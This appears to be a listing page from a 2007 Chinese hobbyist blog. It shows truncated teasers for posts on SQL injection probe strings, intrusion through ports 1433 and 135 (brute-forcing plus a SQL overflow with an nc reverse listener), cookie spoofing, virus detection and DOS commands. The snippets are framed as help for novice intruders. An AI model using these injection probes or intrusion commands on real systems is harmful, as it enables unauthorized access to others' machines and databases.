笨小子's Blog_博客

.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ’’=’

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 ac

阅读全文>>

类别：技术知识 | 评论(0) | 浏览()

各个网络端口的入侵

2007年04月23日星期一 21:34

希望对新手入侵有帮助！

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2.

阅读全文>>

类别：技术知识 | 评论(0) | 浏览()

快速利用135端口入侵个人电脑

2007年04月23日星期一 21:31

通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）

　　协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；

　　使用DCOM可以通过

阅读全文>>

类别：技术知识 | 评论(0) | 浏览()

黑客菜鸟教程之Cookies欺骗

2007年04月23日星期一 21:27

第一、几个基本概念

　　Cookies欺骗，就是在只对用户做Cookies验证的系统中，通过修改Cookies的内容来得到相应的用户权限登录。(呵呵，我自己的定义，高手别见笑)

　　那么什么是Cookies呢，我这里给大家一个专业的解释，Cookies是一个储存于浏览器目录中的文本文件，记录你访问一个特定站点的信息，且只能被创建这个Cookies的站点读回，约由255个字符组成，仅占4KB硬盘空间。当用户正在浏览某站点时，它储存于用户机的随机存取存储器RAM中，退出浏览器后，它储存于用户的硬盘中。储存在Cookies中的大部分

阅读全文>>

类别：技术知识 | 评论(0) | 浏览()

如何才能知道自己的电脑是否有病毒？

2007年04月22日星期日 18:14

们可以按以下几个方法来判断。

　　一、反病毒软件的扫描法

　　这恐怕是我们绝大数朋友首选，也恐怕是唯一的选择，现在病毒种类是越来越多，隐蔽的手段也越来越高明，所以给查杀病毒带来了新的难度，也给反病毒软件开发商带来挑战。但随着计算机程序开发语言的技术性提高、计算机网络越来越普及，病毒的开发和传播是越来越容易了，因而反病毒软件开发公司也是越来越多了。但目前比较有名的还是那么几个系统的反病毒软件，如

阅读全文>>

类别：技术知识 | 评论(0) | 浏览()

dos命令入侵2

2007年04月21日星期六 22:16

#3 三：

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
format 盘符 /FS:类型格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md　目录名创建目录
replace 源文件　要替换文件的目录替换文件
ren 原文件名　新文件名重命名文件名
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
type 文件名显示文本文件的内容
more 文件名逐屏显示输出文件
doskey 要锁定的命令＝字符

阅读全文>>

类别：技术知识 | 评论(0) | 浏览()

[首页] [上一页] [1] [2] [3] [4] [5] [6] 7 [8] [9] [下一页]

文章分类

默认分类(78)

技术知识(81)

自己生活(7)

杂七杂八(10)

文章存档